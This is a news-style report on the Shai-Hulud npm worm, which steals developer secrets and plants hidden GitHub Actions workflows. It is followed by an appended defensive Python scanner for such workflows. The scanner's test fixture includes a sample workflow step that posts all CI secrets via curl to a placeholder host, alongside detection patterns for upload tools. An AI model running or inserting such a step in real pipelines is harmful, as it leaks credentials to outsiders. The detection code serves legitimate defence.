Largest and most perilous npm supply-chain breach, labeled the 'Shai-Hulud' malware campaign, hits hundreds of JavaScript packages
Koi Security has reported what it describes as the largest and most dangerous npm supply-chain compromise to date: the Shai-Hulud malware campaign. The compromise has affected hundreds of npm packages across multiple maintainers, including the popular @ctrl/tinycolor library and packages maintained by CrowdStrike.
The Shai-Hulud malware, named after the colossal sandworms of the Dune universe, is a worm that spreads autonomously from package to package. It infects a package by injecting a large, obfuscated script, often disguised as a harmless update. Once the injected script runs, it harvests credentials and sets up persistence.
The most concerning aspect of the campaign is its theft of secrets from developer endpoints and its installation of backdoors. The malware writes a hidden GitHub Actions workflow file that exfiltrates secrets during CI/CD runs. It also runs TruffleHog, a tool that scans local filesystems and repositories for secrets, to collect npm tokens, GitHub credentials, and cloud access keys for AWS, GCP, and Azure.
StepSecurity has published indicators of compromise and a technical breakdown of how the malware spreads and what it does. They warn that, compared with previous compromises, the Shai-Hulud campaign is among the most dangerous because of its focus on endpoint secret theft and backdoors.
The Shai-Hulud malware campaign has been active since September 2025, so developers and maintainers need to stay vigilant and take the necessary precautions to protect their packages and projects. That means regularly auditing code for suspicious or unknown additions, keeping dependencies up to date, and applying strong security practices throughout development.
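As an added, defender-side illustration of the auditing advice above (example code written for this page, not from the article, Koi Security or StepSecurity): the script below walks a repository's `.github/workflows/` directory, reports any workflow file missing from an expected baseline, and flags files that read the Actions `secrets` context while also invoking a download/upload tool against a host outside a trusted list, which is the shape of the secret-exfiltrating workflow the article describes. The trusted host list, the regexes and the two sample workflows are assumptions constructed for the demo, not indicators from the campaign.

```python
import re
from pathlib import Path

# Heuristics for a workflow step that reads the Actions secrets context and ships it off the runner.
SECRET_REF = re.compile(r"\$\{\{\s*(secrets\.\w+|toJSON\(\s*secrets\s*\))\s*\}\}")
UPLOAD_CMD = re.compile(r"\b(curl|wget|Invoke-WebRequest|Invoke-RestMethod)\b", re.IGNORECASE)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Hosts a CI workflow is normally expected to contact (assumed list); anything else counts as unknown.
TRUSTED_HOSTS = {"github.com", "api.github.com", "registry.npmjs.org"}

def assess_workflow(text: str) -> dict:
    """Regex heuristic over one workflow file's text (no YAML parser needed)."""
    secrets = sorted({m.group(1) for m in SECRET_REF.finditer(text)})
    uploads = bool(UPLOAD_CMD.search(text))
    hosts = sorted({h for h in URL_HOST.findall(text) if h not in TRUSTED_HOSTS})
    # Secrets referenced + an upload tool + an unknown destination is the shape of an exfil step.
    return {"secrets": secrets, "upload_tool": uploads, "unknown_hosts": hosts,
            "flagged": bool(secrets) and uploads and bool(hosts)}

def scan_workflows(repo: Path, expected: set[str]) -> list[dict]:
    """Assess every workflow under .github/workflows and mark files missing from the baseline."""
    wf_dir = repo / ".github" / "workflows"
    findings = []
    for path in (sorted(wf_dir.glob("*.y*ml")) if wf_dir.is_dir() else []):
        result = assess_workflow(path.read_text(errors="replace"))
        result.update(file=path.name, unexpected=path.name not in expected)
        findings.append(result)
    return findings

# Constructed sample workflows for demonstration; not real indicators from the campaign.
BENIGN_WORKFLOW = """name: ci
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
"""
EXFIL_WORKFLOW = """name: update
on: [push]
jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      - run: curl -s -X POST -d '${{ toJSON(secrets) }}' https://collector.example.invalid/upload
"""
```

Run `scan_workflows(Path("."), {"ci.yml"})` from a checkout and review every finding with `unexpected` or `flagged` set; a legitimate workflow that references secrets but only talks to trusted hosts is not flagged.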